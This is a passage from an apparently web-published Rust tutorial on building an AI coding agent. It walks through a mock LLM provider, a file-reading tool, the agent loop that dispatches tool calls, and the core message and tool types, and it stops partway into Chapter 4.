Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

Overview

Welcome to Building a Coding Agent in Rust -- a hands-on tutorial where you build your own AI coding agent from scratch in the mini-claw-code-starter template, guided by the architecture of Claude Code.

Looking for the original V1 hands-on tutorial? It's archived at archive/v1-book/en/ (Chinese translation at archive/v1-book/zh/).

What you'll build

By the end of this book, you'll have built a complete coding agent that:

  • Connects to an LLM via an OpenAI-compatible HTTP provider
  • Uses tools -- bash, file read/write/edit -- with a simple Tool trait
  • Loops autonomously -- the SimpleAgent drives the provider-tool cycle until done
  • Streams events through channels so a UI can show progress in real-time
  • Tests deterministically with a MockProvider that returns canned responses
  • Enforces safety with a permission engine, safety checks, and hooks
  • Loads project instructions from CLAUDE.md files and layered config

Architecture

The starter codebase uses a flat module layout:

mini-claw-code-starter/src/
  types.rs          -- Messages, tools, ToolSet, Provider trait, TokenUsage
  agent.rs          -- SimpleAgent (the core agent loop) and AgentEvent
  mock.rs           -- MockProvider for deterministic testing
  streaming.rs      -- SSE parsing, StreamAccumulator
  instructions.rs   -- InstructionLoader (CLAUDE.md discovery)
  permissions.rs    -- PermissionEngine
  safety.rs         -- SafetyChecker, SafeToolWrapper
  hooks.rs          -- Hook trait, HookRegistry
  planning.rs       -- PlanAgent (two-phase plan/execute)
  config.rs         -- Config, ConfigLoader, CostTracker
  context.rs        -- SystemPromptBuilder
  providers/
    openrouter.rs   -- OpenRouterProvider (real HTTP backend)
  tools/            -- Tool implementations (bash, file read/write/edit)

How to use this book

Start with Chapters 1-3. Three short, hands-on chapters get you from zero to a working agent in under an hour:

  1. Your First LLM Call — implement MockProvider (test_mock_)
  2. Your First Tool Call — implement ReadTool (test_read_)
  3. The Agentic Loop — implement single_turn and SimpleAgent (test_single_turn_, test_simple_agent_)

Then continue with Chapters 4-18 for the full architecture: streaming, permissions, hooks, plan mode, configuration, and more.

The mini-claw-code-starter crate contains stub implementations with unimplemented!() markers and doc comments describing what to do. Read the chapter, fill in the stubs, then verify your work by running the tests.

Run tests to check your progress:

# Run tests for a specific chapter (use the correct test name from the table below)
cargo test -p mini-claw-code-starter test_mock_

# Run all tests
cargo test -p mini-claw-code-starter

Prerequisites

  • Rust (edition 2024, 1.85+)
  • Basic familiarity with async Rust (async/await, tokio)
  • An OpenRouter API key (for the live provider chapters)

Chapter roadmap

Getting Started

ChapterTopicFile(s) to editTest command
1Your First LLM Callsrc/mock.rstest_mock_
2Your First Tool Callsrc/tools/read.rstest_read_
3The Agentic Loopsrc/agent.rstest_single_turn_, test_simple_agent_

Part I: Core Agent

ChapterTopicFile(s) to editTest command
4Messages & Typessrc/types.rs (pre-filled)test_mock_
5aProvider & Streaming Foundationssrc/mock.rs, src/streaming.rstest_mock_, test_streaming_parse_, test_streaming_accumulator_
5bOpenRouter & StreamingAgentsrc/providers/openrouter.rs, src/streaming.rstest_openrouter_, test_streaming_stream_chat_, test_streaming_streaming_agent_
6Tool Interfacesrc/tools/read.rs (already done in Ch2 — re-read)test_read_
7The Agentic Loop (Deep Dive)src/agent.rs (already done in Ch3 — re-read)test_single_turn_, test_simple_agent_

Part II: Prompt & Tools

ChapterTopicFile(s) to editTest command
8System Promptsrc/instructions.rsinstructions
9File Toolssrc/tools/write.rs, src/tools/edit.rs (read.rs already done in Ch2)test_read_, test_write_, test_edit_
10Bash Toolsrc/tools/bash.rstest_bash_
11Search Tools(extension -- no stubs)(no tests)
12Tool Registrysrc/types.rs (ToolSet — pre-filled, re-read)test_multi_tool_

Part III: Safety & Control

ChapterTopicFile(s) to editTest command
13Permission Enginesrc/permissions.rspermissions
14Safety Checkssrc/safety.rssafety
15Hookssrc/hooks.rshooks
16Plan Modesrc/planning.rsplan

Part IV: Configuration

ChapterTopicFile(s) to editTest command
17Settings Hierarchysrc/config.rs, src/usage.rsconfig, cost_tracker
18Project Instructionssrc/instructions.rs, src/context.rsinstructions, context_manager

Bonus (no chapter yet -- stubs + tests available)

TopicFile to editTest command
AskTool (user input)src/tools/ask.rsask (run with --ignored)
SubagentTool (child agents)src/subagent.rssubagent (run with --ignored)
Interactive CLIexamples/chat.rscargo run --example chat (after stub is filled in)

Let's start building.

Chapter 1: Your First LLM Call

File(s) to edit: src/mock.rs Test to run: cargo test -p mini-claw-code-starter test_mock_ Estimated time: 15 min

Before building an agent, you need to talk to an LLM. In this chapter you will implement a MockProvider — a fake LLM that returns canned responses. No API key, no HTTP, no network. Just the protocol.

The nouns

Before any code, a one-line glossary of the types you'll meet in chapters 1–3. They're all already defined in src/types.rs — this list is just so the names aren't strangers. Chapter 4 is the deep dive; for now, a sentence each is enough:

TypeWhat it is
MessageEnum of conversation entries: System, User, Assistant, ToolResult, Attachment, Progress.
AssistantTurnWhat the LLM returns: optional text, a Vec<ToolCall>, a StopReason, optional TokenUsage.
StopReasonStop (the LLM is done) or ToolUse (it wants to call tools).
ToolCallLLM's request to call a tool: id, name, JSON arguments.
ToolDefinitionJSON-Schema description of a tool, sent to the LLM so it knows what's available.
ToolTrait with definition() and call() — implement it to give the agent a new capability.
ToolSetA HashMap<String, Box<dyn Tool>> for dispatching tool calls by name.
ProviderTrait with one chat() method — the abstraction over "an LLM that responds to messages."

If any of these feel fuzzy later, come back here. Chapter 4 rebuilds all of them from scratch with full commentary.

Goal

Implement MockProvider so that:

  1. You create it with a VecDeque<AssistantTurn> of canned responses.
  2. Each call to chat() returns the next response in sequence.
  3. If all responses have been consumed, it returns an error.

The protocol

Every LLM interaction follows the same pattern:

sequenceDiagram
    participant C as Your Code
    participant L as LLM

    C->>L: messages + tool definitions
    L-->>C: text and/or tool calls + stop reason

You send messages and a list of available tools. The LLM responds with text, tool calls, or both — plus a StopReason telling you what to do next.

In Rust, that is one trait with one method:

#![allow(unused)]
fn main() {
pub trait Provider: Send + Sync {
    fn chat(
        &self,
        messages: &[Message],
        tools: &[&ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send;
}
}

The core types

Open mini-claw-code-starter/src/types.rs. These types are already defined for you — read them to understand the protocol:

classDiagram
    class Provider {
        <<trait>>
        +chat(messages, tools) AssistantTurn
    }

    class AssistantTurn {
        text: Option~String~
        tool_calls: Vec~ToolCall~
        stop_reason: StopReason
        usage: Option~TokenUsage~
    }

    class StopReason {
        <<enum>>
        Stop
        ToolUse
    }

    class Message {
        <<enum>>
        System(String)
        User(String)
        Assistant(AssistantTurn)
        ToolResult
    }

    Provider --> AssistantTurn : returns
    Provider --> Message : receives
    AssistantTurn --> StopReason
    AssistantTurn --> ToolCall : contains 0..*

The LLM responds with an AssistantTurn:

#![allow(unused)]
fn main() {
pub struct AssistantTurn {
    pub text: Option<String>,          // what the LLM said
    pub tool_calls: Vec<ToolCall>,     // tools it wants to call
    pub stop_reason: StopReason,       // Stop or ToolUse
    pub usage: Option<TokenUsage>,     // token counts (optional)
}
}

Two outcomes:

  • StopReason::Stop — the LLM is done, read text for the answer
  • StopReason::ToolUse — the LLM wants to call tools, read tool_calls

That's it. Every coding agent — Claude Code, Cursor, Copilot — runs on this exact protocol.

Key Rust concept: Mutex for interior mutability

The Provider trait takes &self (not &mut self) because providers are shared across async tasks. But MockProvider needs to mutate its response queue. The solution is Mutex<VecDeque<AssistantTurn>> — it lets you mutate the queue through a shared reference.

#![allow(unused)]
fn main() {
pub struct MockProvider {
    responses: Mutex<VecDeque<AssistantTurn>>,
}
}

This pattern — Mutex around shared state in a &self method — appears throughout async Rust.

The implementation

Open src/mock.rs. You'll see the struct definition and two stubs.

Step 1: new()

Wrap the VecDeque in a Mutex:

#![allow(unused)]
fn main() {
pub fn new(responses: VecDeque<AssistantTurn>) -> Self {
    Self {
        responses: Mutex::new(responses),
    }
}
}

Step 2: chat()

Lock the mutex, pop the front response, convert None to an error:

#![allow(unused)]
fn main() {
async fn chat(
    &self,
    _messages: &[Message],
    _tools: &[&ToolDefinition],
) -> anyhow::Result<AssistantTurn> {
    self.responses
        .lock()
        .unwrap()
        .pop_front()
        .ok_or_else(|| anyhow::anyhow!("MockProvider: no more responses"))
}
}

Three lines of logic. The mock ignores messages and tools entirely — it just returns the next canned response.

Run the tests

cargo test -p mini-claw-code-starter test_mock_

14 tests verify your mock:

  • test_mock_returns_text — basic text response
  • test_mock_returns_tool_calls — response with tool calls
  • test_mock_steps_through_sequence — FIFO order across multiple calls
  • test_mock_empty_responses_exhausted — error when queue is empty
  • test_mock_ignores_messages_and_tools — mock doesn't look at inputs
  • test_mock_long_sequence — 10 responses consumed in order

What just happened

You implemented the Provider trait — the interface every LLM backend must satisfy. The MockProvider is your testing workhorse. Every test in this entire course uses it instead of calling a real API.

Later (Chapter 5b) you'll see OpenRouterProvider, which makes real HTTP calls. But the trait is the same. Swap the provider, and the rest of the code doesn't change.

Key takeaway

An LLM is a function: messages in → (text, tool_calls, stop_reason) out. Everything else is plumbing.

Check yourself


← Contents · Chapter 2: Your First Tool Call →

Chapter 2: Your First Tool Call

File(s) to edit: src/tools/read.rs Test to run: cargo test -p mini-claw-code-starter test_read_ Estimated time: 15 min

An LLM can't read files, run commands, or browse the web. It can only generate text. But it can ask your code to do those things. That's what tools are.

Goal

Implement ReadTool so that:

  1. It declares its name, description, and parameter schema.
  2. When called with {"path": "some/file.txt"}, it reads the file and returns its contents.
  3. Missing arguments or non-existent files produce errors.

How tool calling works

The LLM never touches the filesystem. It describes what it wants, and your code does it:

sequenceDiagram
    participant A as Agent
    participant L as LLM
    participant T as ReadTool

    A->>L: "What's in doc.txt?" + tool schemas
    L-->>A: tool_call: read(path="doc.txt")
    A->>T: call({"path": "doc.txt"})
    T-->>A: "file contents here..."
    A->>L: tool result: "file contents here..."
    L-->>A: "The file contains..."

The LLM sees a JSON schema describing each tool. When it decides to use one, it outputs a structured request with the tool name and arguments. Your code parses this, runs the real function, and sends the result back.

The Tool trait

Open mini-claw-code-starter/src/types.rs and find the Tool trait:

#![allow(unused)]
fn main() {
#[async_trait::async_trait]
pub trait Tool: Send + Sync {
    fn definition(&self) -> &ToolDefinition;
    async fn call(&self, args: Value) -> anyhow::Result<String>;
}
}

Two methods:

  • definition() returns the JSON schema that tells the LLM what this tool does and what arguments it takes
  • call() executes the tool and returns a string result

Why #[async_trait] on Tool — and not on Provider?

You'll see this split throughout the book, so it's worth owning the one-liner now:

  • Tool uses #[async_trait] because we store tools heterogeneously in Box<dyn Tool> (a ReadTool and a BashTool coexist in one HashMap). Box<dyn …> requires object safety, and a plain async fn in a trait is not object-safe — it returns an anonymous future type the compiler can't erase. The #[async_trait] macro rewrites async fn call(&self, …) into fn call(&self, …) -> Pin<Box<dyn Future + Send + '_>>, which is. One heap allocation per call, which is nothing next to the I/O the tool is about to do.
  • Provider uses RPITIT (return-position impl Trait in traits, stable since Rust 1.75) because we only ever hold it as a generic parameter — SimpleAgent<P: Provider> — never as dyn Provider. Without object safety to preserve, we get the zero-cost version: no boxing, no allocation, the compiler monomorphizes a unique future type per impl.

The two-line mnemonic:

stored as Box<dyn T>           → #[async_trait]  (boxed future, object-safe)
used as a generic P: Trait     → RPITIT          (zero-cost, not object-safe)

That's the whole trade-off. Chapter 6 reprises it with the full Provider signature side-by-side once you've seen both traits in use.

The implementation

Open src/tools/read.rs. You'll see the struct and two stubs.

Step 1: The definition

A ToolDefinition describes the tool to the LLM using JSON Schema:

#![allow(unused)]
fn main() {
pub fn new() -> Self {
    Self {
        definition: ToolDefinition::new("read", "Read the contents of a file.")
            .param("path", "string", "Absolute path to the file", true),
    }
}
}

The .param() builder adds a parameter with its type, description, and whether it's required. When the LLM sees this schema, it knows it can call a tool named "read" with a required string argument "path".

Step 2: The call

Extract the path from the JSON arguments, read the file, return the contents:

#![allow(unused)]
fn main() {
async fn call(&self, args: Value) -> anyhow::Result<String> {
    let path = args["path"]
        .as_str()
        .context("missing 'path' argument")?;

    tokio::fs::read_to_string(path)
        .await
        .with_context(|| format!("failed to read '{path}'"))
}
}

Three lines of logic. args is a serde_json::Value — the parsed JSON arguments from the LLM. The context() and with_context() methods (from anyhow) add human-readable error messages.

Here is the data flow:

flowchart LR
    A["args: path = foo.txt"] --> B["as_str()"]
    B --> C["tokio::fs::read_to_string"]
    C --> D["Ok: file contents"]
    C --> E["Err: failed to read"]

Run the tests

cargo test -p mini-claw-code-starter test_read_

15 tests verify your tool:

  • test_read_read_definition — schema has the right name and required params
  • test_read_read_file — reads a real file from a temp directory
  • test_read_read_missing_file — returns an error for nonexistent files
  • test_read_read_missing_arg — returns an error when path is missing
  • test_read_read_utf8_content — handles multi-line content correctly
  • test_read_read_empty_file — reads an empty file without error

The pattern

Every tool in this project follows the same three-step pattern:

  1. DefineToolDefinition::new("name", "description").param(...)
  2. Extract — pull arguments from the JSON Value
  3. Execute — do the thing, return a String

You'll repeat this for WriteTool, EditTool, and BashTool in later chapters. Once you've written one tool, you've written them all.

Key takeaway

A tool is the bridge between "the LLM wants to read a file" and "the file is actually read." The LLM describes its intent as structured JSON. Your code does the work.

Check yourself


← Chapter 1: Your First LLM Call · Contents · Chapter 3: The Agentic Loop →

Chapter 3: The Agentic Loop

File(s) to edit: src/agent.rs Tests to run: cargo test -p mini-claw-code-starter test_single_turn_ (single_turn), cargo test -p mini-claw-code-starter test_simple_agent_ (SimpleAgent) Estimated time: 20 min

You have a provider (talks to the LLM) and a tool (reads files). Now you connect them. This is where the agent comes alive.

Goal

Implement two things:

  1. single_turn() — handle one prompt with at most one round of tool calls
  2. SimpleAgent — wrap single_turn in a loop that keeps going until the LLM is done

What's in scope for Ch3 (and what isn't)

When you open src/agent.rs you'll see five unimplemented!() stubs. Only four of them are Chapter 3's job:

StubChapterNotes
single_turnCh3one prompt, at most one tool round
SimpleAgent::execute_toolsCh3look up each tool, collect (id, content) pairs
SimpleAgent::push_resultsCh3push Assistant turn, then one ToolResult each
SimpleAgent::chatCh3the main agent loop
SimpleAgent::run_with_historyCh7events-based loop; leave stubbed for now

The run_with_history / run_with_events pair is for Chapter 7 (AgentEvent-driven execution). No Ch3 test calls them, so the unimplemented!() there will not panic during test_simple_agent_. Ignore them until Chapter 7 introduces the events model.

The core idea

Every coding agent — Claude Code, Cursor, Aider — is this loop:

loop {
    response = provider.chat(messages, tools)
    if response.stop_reason == Stop:
        return response.text
    for call in response.tool_calls:
        result = tools.execute(call)
        messages.append(result)
}

The LLM decides when to stop. Your code just follows instructions.

flowchart TD
    A["User prompt"] --> B["provider.chat()"]
    B --> C{"stop_reason?"}
    C -- "Stop" --> D["Return text"]
    C -- "ToolUse" --> E["Execute tool calls"]
    E --> F["Append results to messages"]
    F --> B

Part 1: single_turn()

Start simple. single_turn() handles one prompt with at most one round of tool calls — no looping yet.

Key Rust concept: ToolSet

The function takes a &ToolSet — a HashMap<String, Box<dyn Tool>> that indexes tools by name for O(1) lookup:

#![allow(unused)]
fn main() {
pub async fn single_turn<P: Provider>(
    provider: &P,
    tools: &ToolSet,
    prompt: &str,
) -> anyhow::Result<String>
}

The flow

flowchart TD
    A["prompt"] --> B["provider.chat()"]
    B --> C{"stop_reason?"}
    C -- "Stop" --> D["Return text"]
    C -- "ToolUse" --> E["Execute each tool call"]
    E --> F{"Tool found?"}
    F -- "Yes" --> G["tool.call() → result"]
    F -- "No" --> H["error: unknown tool"]
    G --> I["Push Assistant + ToolResult messages"]
    H --> I
    I --> J["provider.chat() again"]
    J --> K["Return final text"]

Implementation

#![allow(unused)]
fn main() {
pub async fn single_turn<P: Provider>(
    provider: &P,
    tools: &ToolSet,
    prompt: &str,
) -> anyhow::Result<String> {
    let defs = tools.definitions();
    let mut messages = vec![Message::User(prompt.to_string())];

    let turn = provider.chat(&messages, &defs).await?;

    match turn.stop_reason {
        StopReason::Stop => Ok(turn.text.unwrap_or_default()),
        StopReason::ToolUse => {
            // Execute each tool call, collect results
            let mut results = Vec::new();
            for call in &turn.tool_calls {
                let content = match tools.get(&call.name) {
                    Some(t) => t.call(call.arguments.clone())
                        .await
                        .unwrap_or_else(|e| format!("error: {e}")),
                    None => format!("error: unknown tool `{}`", call.name),
                };
                results.push((call.id.clone(), content));
            }

            // Feed results back to the LLM
            messages.push(Message::Assistant(turn));
            for (id, content) in results {
                messages.push(Message::ToolResult { id, content });
            }

            let final_turn = provider.chat(&messages, &defs).await?;
            Ok(final_turn.text.unwrap_or_default())
        }
    }
}
}

Three key details:

  1. Collect results before pushing Message::Assistant(turn) — the push moves turn, so you can't borrow turn.tool_calls after that
  2. Never crash on tool failure — catch errors with unwrap_or_else and return them as strings. The LLM reads the error and adapts
  3. Unknown tools get an error string — not a panic. The LLM might hallucinate a tool name; your agent handles it gracefully

Test it

cargo test -p mini-claw-code-starter test_single_turn_

14 tests including:

  • test_single_turn_direct_response — LLM responds immediately, no tools
  • test_single_turn_one_tool_call — LLM reads a file, then answers
  • test_single_turn_unknown_tool — LLM calls a nonexistent tool, gets an error, recovers
  • test_single_turn_provider_error — provider returns an error, propagated correctly

Part 2: SimpleAgent

single_turn handles one round. A real agent loops until the LLM is done. That's SimpleAgent.

The struct

#![allow(unused)]
fn main() {
pub struct SimpleAgent<P: Provider> {
    provider: P,
    tools: ToolSet,
}
}

Constructor and builder

#![allow(unused)]
fn main() {
pub fn new(provider: P) -> Self {
    Self { provider, tools: ToolSet::new() }
}

pub fn tool(mut self, t: impl Tool + 'static) -> Self {
    self.tools.push(t);
    self
}
}

The builder pattern lets you chain tool registration:

#![allow(unused)]
fn main() {
let agent = SimpleAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new())
    .tool(BashTool::new());
}

The loop: chat()

Aside: who decides Stop vs ToolUse?

The model does. StopReason is not a value we compute from the response; it is a field the LLM API returns describing what the model did. When the model emitted plain text and stopped, the API reports stop (or end_turn). When the model emitted one or more tool-call blocks and paused expecting the caller to run them, the API reports tool_use (OpenAI calls it tool_calls). Our StopReason enum is just a thin translation of that API field into a Rust type; the decision is baked into the model's generation.

Practically, the model decides in a single forward pass: once it begins writing a tool-call block, most providers force the response to terminate on that block and return tool_use to the caller. It does not produce text and then choose whether to call a tool as a separate step. This is why the loop below looks so simple -- we never have to second-guess the stop reason, we just dispatch on it.


This is single_turn generalized into a loop. Instead of calling the provider twice and returning, it keeps going until StopReason::Stop:

#![allow(unused)]
fn main() {
pub async fn chat(&self, messages: &mut Vec<Message>) -> anyhow::Result<String> {
    let defs = self.tools.definitions();

    loop {
        let turn = self.provider.chat(messages, &defs).await?;

        match turn.stop_reason {
            StopReason::Stop => {
                let text = turn.text.clone().unwrap_or_default();
                messages.push(Message::Assistant(turn));
                return Ok(text);
            }
            StopReason::ToolUse => {
                let results = self.execute_tools(&turn.tool_calls).await;
                Self::push_results(messages, turn, results);
            }
        }
    }
}
}

Note: clone turn.text before pushing Message::Assistant(turn) — the push moves turn.

run() is a convenience wrapper:

#![allow(unused)]
fn main() {
pub async fn run(&self, prompt: &str) -> anyhow::Result<String> {
    let mut messages = vec![Message::User(prompt.to_string())];
    self.chat(&mut messages).await
}
}

The helper methods execute_tools() and push_results() factor out the tool execution and message building — see the stubs in agent.rs for the signatures.

Test it

cargo test -p mini-claw-code-starter test_simple_agent_

16 tests including:

  • test_simple_agent_simple_text — single-turn text response
  • test_simple_agent_multi_step — LLM reads a file, then writes a response
  • test_simple_agent_three_turn_loop — read → edit → verify, three rounds
  • test_simple_agent_error_recovery — tool fails, LLM reads the error and adapts

What just happened

You built a coding agent.

#![allow(unused)]
fn main() {
let agent = SimpleAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new())
    .tool(BashTool::new());

let answer = agent.run("What files are in this directory?").await?;
}

The agent sends the prompt to the LLM, the LLM calls bash("ls"), the agent executes it, feeds the output back, and the LLM summarizes the result. The loop handles any number of tool calls across any number of rounds.

That is the architecture. Everything else — streaming, permissions, plan mode, subagents — is built on top of this loop.

Check yourself


← Chapter 2: Your First Tool Call · Contents · Chapter 4: Messages & Types →

Chapter 4: Messages & Types

File(s) to edit: none — src/types.rs is pre-filled in the starter. This chapter is a study-only deep dive into the type system you have already been using. Test to run: cargo test -p mini-claw-code-starter test_mock_ still passes after this chapter (and did before) because the actual implementation work is in src/mock.rs, which you filled in Chapter 1. The tests exercise the shapes defined in types.rs, which is why we connect them here. Estimated time: 20 min (study only)

Goal

  • Understand how the Message enum's four variants (System, User, Assistant, ToolResult) give every conversation participant a typed representation.
  • Understand the ToolDefinition builder pattern and why tools describe their JSON Schema parameters at construction time rather than hand-writing JSON.
  • Understand ToolSet as the runtime registry that lets the agent dispatch tool calls by name.
  • Understand the Provider trait's RPITIT signature and why it leaves room for any LLM backend to drop in without changing agent code.

Every coding agent is, at its core, a loop over a conversation. The user speaks, the model replies, tools produce results, and those results go back to the model. Before we can build that loop, we need a type system that represents every participant and every kind of payload in the conversation.

This chapter walks through the foundational types that the rest of the codebase depends on. Nothing here needs to be written by you -- src/types.rs is complete in the starter. Read for comprehension; the hands-on work resumes in Chapter 5a.

How the types connect

flowchart TD
    U[Message::User] --> P[Provider::chat]
    S[Message::System] --> P
    P --> AT[AssistantTurn]
    AT --> SR{StopReason}
    SR -->|Stop| Text[Final text response]
    SR -->|ToolUse| TC[ToolCall]
    TC --> TS[ToolSet::get]
    TS --> T[Tool::call]
    T --> TR[Message::ToolResult]
    TR --> P

Why a rich message type?

If you look at a raw LLM API (OpenAI, Anthropic), messages are JSON blobs with a role field: "system", "user", or "assistant". That is fine for a one-shot chatbot, but a coding agent needs more:

  • Tool results that carry the ID of the tool call they answer, so the model can correlate request and response.
  • System instructions that configure the model's behavior.

Claude Code models all of these as variants of a single Message enum. Our starter uses a simplified version with four variants.

File layout

All types live in a single file: src/types.rs. This includes the Message enum, AssistantTurn, ToolDefinition, ToolCall, Tool trait, ToolSet, Provider trait, TokenUsage, and StopReason.


1.1 The Message enum

Here is the full enum with its four variants:

#![allow(unused)]
fn main() {
pub enum Message {
    System(String),
    User(String),
    Assistant(AssistantTurn),
    ToolResult { id: String, content: String },
}
}

The starter uses plain enum variants instead of wrapper structs. There are no message IDs, no serde tags, no constructors -- you construct variants directly:

#![allow(unused)]
fn main() {
let msg = Message::User("Hello".to_string());
let sys = Message::System("You are a helpful assistant".to_string());
let result = Message::ToolResult {
    id: call_id.clone(),
    content: "file contents here".to_string(),
};
}

Let's walk through each variant.

System

#![allow(unused)]
fn main() {
Message::System(String)
}

System messages carry instructions injected by the agent, not typed by the user. They configure the model's behavior (e.g., "You are a coding assistant").

User

#![allow(unused)]
fn main() {
Message::User(String)
}

Straightforward -- the human's input. One message per turn.

Assistant

#![allow(unused)]
fn main() {
Message::Assistant(AssistantTurn)
}

This is the richest variant. The model's response is wrapped in an AssistantTurn struct (described below). The model can return text, tool calls, or both.

ToolResult

#![allow(unused)]
fn main() {
Message::ToolResult { id: String, content: String }
}

After the agent executes a tool, it packages the output into a ToolResult variant and appends it to the conversation. The id field links this result back to the specific ToolCall it answers -- without this, the model cannot correlate which result belongs to which call when multiple tools run in a single turn.

Note that in the starter, tool results are simple strings. There is no is_truncated flag or separate struct.


1.2 AssistantTurn

The assistant's response is captured in an AssistantTurn struct:

#![allow(unused)]
fn main() {
pub struct AssistantTurn {
    pub text: Option<String>,
    pub tool_calls: Vec<ToolCall>,
    pub stop_reason: StopReason,
    pub usage: Option<TokenUsage>,
}
}

The model can return text, tool calls, or both. text is Option<String> because when the model decides to use a tool, it may produce no human-readable text at all -- it just emits one or more ToolCall entries. The stop_reason tells the agent loop whether to execute tools and continue, or to present the response to the user and stop.

The usage field is Option<TokenUsage> because we attach token counts at parse time from the API response. Mock providers in tests may leave it as None.


1.3 StopReason

#![allow(unused)]
fn main() {
pub enum StopReason {
    /// The model finished — check `text` for the response.
    Stop,
    /// The model wants to use tools — check `tool_calls`.
    ToolUse,
}
}

This tiny enum drives the entire agent loop. When the provider parses the LLM response:

  • Stop means the model is done -- its text field contains the final answer for the user.
  • ToolUse means the model wants to invoke tools -- the agent should look at tool_calls, execute them, append the results, and call the provider again.

The agent loop uses match on stop_reason to decide whether to break or continue.


1.4 ToolCall

#![allow(unused)]
fn main() {
pub struct ToolCall {
    pub id: String,
    pub name: String,
    pub arguments: Value,
}
}

When the LLM responds with StopReason::ToolUse, it includes one or more ToolCall entries. Each has:

  • id -- a unique identifier assigned by the API (e.g., "call_abc123"). This is what ToolResultMessage::tool_use_id references.
  • name -- which tool to invoke (e.g., "bash", "read", "edit").
  • arguments -- a JSON object whose shape matches the tool's parameter schema.

The agent loop uses name to look up the tool in the ToolSet, passes arguments to tool.call(), and wraps the output in a Message::ToolResult whose id matches the ToolCall's id.


1.5 ToolDefinition and the builder pattern

Rust concept: the builder pattern

The ToolDefinition uses the builder pattern -- a common Rust idiom where methods take self by value and return Self, enabling method chaining like .param(...).param(...). Each call consumes the struct and returns a modified version. This works because Rust's move semantics mean there is no overhead -- no cloning, no reference counting. The compiler optimizes the chain into a series of in-place mutations. You will see this pattern throughout the codebase: ToolSet::new().with(tool1).with(tool2), SimpleAgent::new(provider).tool(bash).

Every tool must describe itself to the LLM with a JSON Schema so the model knows what parameters are available. ToolDefinition holds this schema and provides a builder API for constructing it without hand-writing JSON:

#![allow(unused)]
fn main() {
pub struct ToolDefinition {
    pub name: &'static str,
    pub description: &'static str,
    pub parameters: Value,
}
}

The constructor initializes an empty object schema:

#![allow(unused)]
fn main() {
impl ToolDefinition {
    pub fn new(name: &'static str, description: &'static str) -> Self {
        Self {
            name,
            description,
            parameters: serde_json::json!({
                "type": "object",
                "properties": {},
                "required": []
            }),
        }
    }
}
}

.param() -- add a simple parameter

#![allow(unused)]
fn main() {
pub fn param(
    mut self,
    name: &str,
    type_: &str,
    description: &str,
    required: bool,
) -> Self {
    self.parameters["properties"][name] = serde_json::json!({
        "type": type_,
        "description": description
    });
    if required {
        self.parameters["required"]
            .as_array_mut()
            .unwrap()
            .push(Value::String(name.to_string()));
    }
    self
}
}

This is the workhorse. Most tool parameters are simple types -- a "string" for a file path, a "number" for a line offset. The builder takes self by value and returns it, enabling chained calls:

#![allow(unused)]
fn main() {
ToolDefinition::new("read", "Read a file from disk")
    .param("path", "string", "Absolute path to the file", true)
    .param("offset", "number", "Line number to start reading from", false)
    .param("limit", "number", "Maximum number of lines to read", false)
}

.param_raw() -- add a complex parameter

#![allow(unused)]
fn main() {
pub fn param_raw(
    mut self,
    name: &str,
    schema: Value,
    required: bool,
) -> Self {
    self.parameters["properties"][name] = schema;
    if required {
        self.parameters["required"]
            .as_array_mut()
            .unwrap()
            .push(Value::String(name.to_string()));
    }
    self
}
}

Some parameters need richer schemas -- enums, arrays, nested objects. param_raw lets you pass an arbitrary serde_json::Value as the schema. For example, an edit tool might define:

#![allow(unused)]
fn main() {
.param_raw("changes", serde_json::json!({
    "type": "array",
    "items": {
        "type": "object",
        "properties": {
            "old_string": { "type": "string" },
            "new_string": { "type": "string" }
        }
    }
}), true)
}

Implement ToolDefinition in src/types.rs. There are no dedicated unit tests for the builder itself in the starter -- its correctness is exercised indirectly by every tool's _definition test (for example test_read_read_definition in tests/read.rs). Making cargo build -p mini-claw-code-starter succeed is the practical check here.


1.6 The Tool trait

This is the central abstraction. Every tool -- Bash, Read, Write, Edit -- implements this trait:

#![allow(unused)]
fn main() {
#[async_trait::async_trait]
pub trait Tool: Send + Sync {
    fn definition(&self) -> &ToolDefinition;
    async fn call(&self, args: Value) -> anyhow::Result<String>;
}
}

Just two required methods -- this is deliberately minimal:

definition() returns the tool's schema. This is called once when registering tools and whenever the agent needs to send tool definitions to the LLM. It returns a reference (&ToolDefinition) because the definition is static for the lifetime of the tool.

call() is the execution entry point. It receives the JSON arguments the LLM provided and returns a String result (or an error). This is async because most tools do I/O -- reading files, running subprocesses, making HTTP requests.

Note that call() returns anyhow::Result<String> -- not a ToolResult struct. The starter simplifies tool output to plain strings. If a tool fails, you can return Ok(format!("error: {e}")) to let the model see the error and recover, or return Err(e) for unrecoverable situations.

The trait uses #[async_trait] and is marked Send + Sync so tools can be stored as Box<dyn Tool> in the ToolSet and called from async contexts. For why Tool uses #[async_trait] while Provider uses RPITIT, see Why two async trait styles?.


1.7 ToolSet

The agent needs to look up tools by name when the LLM requests a tool call. ToolSet is a HashMap-backed registry:

#![allow(unused)]
fn main() {
pub struct ToolSet {
    tools: HashMap<String, Box<dyn Tool>>,
}
}

The key methods:

#![allow(unused)]
fn main() {
impl ToolSet {
    pub fn new() -> Self {
        Self { tools: HashMap::new() }
    }

    /// Builder-style: add a tool and return self.
    pub fn with(mut self, tool: impl Tool + 'static) -> Self {
        self.push(tool);
        self
    }

    /// Add a tool, keyed by its definition name.
    pub fn push(&mut self, tool: impl Tool + 'static) {
        let name = tool.definition().name.to_string();
        self.tools.insert(name, Box::new(tool));
    }

    /// Look up a tool by name.
    pub fn get(&self, name: &str) -> Option<&dyn Tool> {
        self.tools.get(name).map(|t| t.as_ref())
    }

    /// Collect all tool schemas for the provider.
    pub fn definitions(&self) -> Vec<&ToolDefinition> {
        self.tools.values().map(|t| t.definition()).collect()
    }
}

impl Default for ToolSet {
    fn default() -> Self {
        Self::new()
    }
}
}

A few design points:

  • with() enables builder-style chaining: ToolSet::new().with(ReadTool::new()).with(BashTool::new()).
  • push() extracts the name from the tool's definition, so you never pass the name manually -- one source of truth.
  • definitions() collects all schemas into a Vec that the provider sends to the LLM at the start of each turn.
  • Box<dyn Tool> is the trait object that makes heterogeneous storage possible. The 'static bound on push/with ensures the tool lives long enough.

ToolSet has no dedicated test of its own in the starter -- it is exercised by the test_single_turn_* suite (Chapter 3) and test_multi_tool_* suite (Chapter 12), both of which construct real ToolSets and assert their definitions are rendered correctly.


1.8 TokenUsage

LLM APIs report token counts with each response. Tracking these is useful for cost awareness and debugging.

#![allow(unused)]
fn main() {
